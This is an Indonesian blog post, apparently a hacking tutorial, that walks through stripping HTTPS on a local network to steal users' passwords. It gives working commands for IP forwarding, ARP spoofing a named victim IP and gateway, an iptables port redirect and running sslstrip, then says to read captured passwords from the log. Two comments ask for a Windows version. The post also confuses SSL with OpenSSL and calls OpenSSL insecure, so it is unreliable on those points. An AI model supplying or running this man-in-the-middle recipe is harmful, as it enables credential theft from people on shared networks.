Beranda > Debian Servers, Hackingnology > Hacking OpenSSL (dengan SSLStrip)

Hacking OpenSSL (dengan SSLStrip)

Selamat malem nie, berikut salah satu pengalaman dan pengetahuan saya selama belajar Informatika. Sesuai judulnya, kita akan menghack User ataupun Password, pada protocol OpenSSL ( Secure Socket Layer). Pada artikel saya sebelumnya, tentang “Panen password jaringan via Cain & Able” , hanya saja pada Cain&Able, tidak bisa untuk OpenSSL Protocol.

Mungking anda bertanya-tanya, apa itu OpenSSL. Contoh OpenSSL/Secure Socket Layer ; https, ftps, dll. Sekarang, OpenSSL tidaklah lagi aman. Cara ini, bisa kita praktekan pada Jaringan HUB ataupun SWITCH. Dan Sistem Operasi apapun yang digunakan Komputer Korban bisa di Hack. Karena kelamhan ini terletak di Jaringan, bukan di Sistem.

Langsung saja kita praktek, kali ini kita gunakan OS LINUX untuk PC kita.

1. Setting IP Forward

echo 1 > /proc/sys/net/ipv4/ip_forward

2. Arp attack antara PC korban dan Gateway

arpspoof -i eth0 -t 192.168.102.14 192.168.102.1

3. Setting port redirect

iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port 10000

4. Start sslsrtip (default port 10000)

python sslstrip.py -w secret

5. Watch the Miracle

Jika dirasa sudah ada password yang kena, tinggal kita lihat di file “sslstrip.log”

Download SSLStrip di SINI

  1. katon
    1 Januari 2011 pukul 10:53 PM

    ada nggak buat windows

  2. walker
    31 Januari 2011 pukul 4:20 PM

    mas mnta yg bwt wndows………. tlong krimkn di email q
    ni almt emailq ekoprasetiyo97@yahoo.com

  1. No trackbacks yet.

Tinggalkan Balasan

Isikan data di bawah atau klik salah satu ikon untuk log in:

Logo WordPress.com

You are commenting using your WordPress.com account. Logout / Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout / Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout / Ubah )

Foto Google+

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s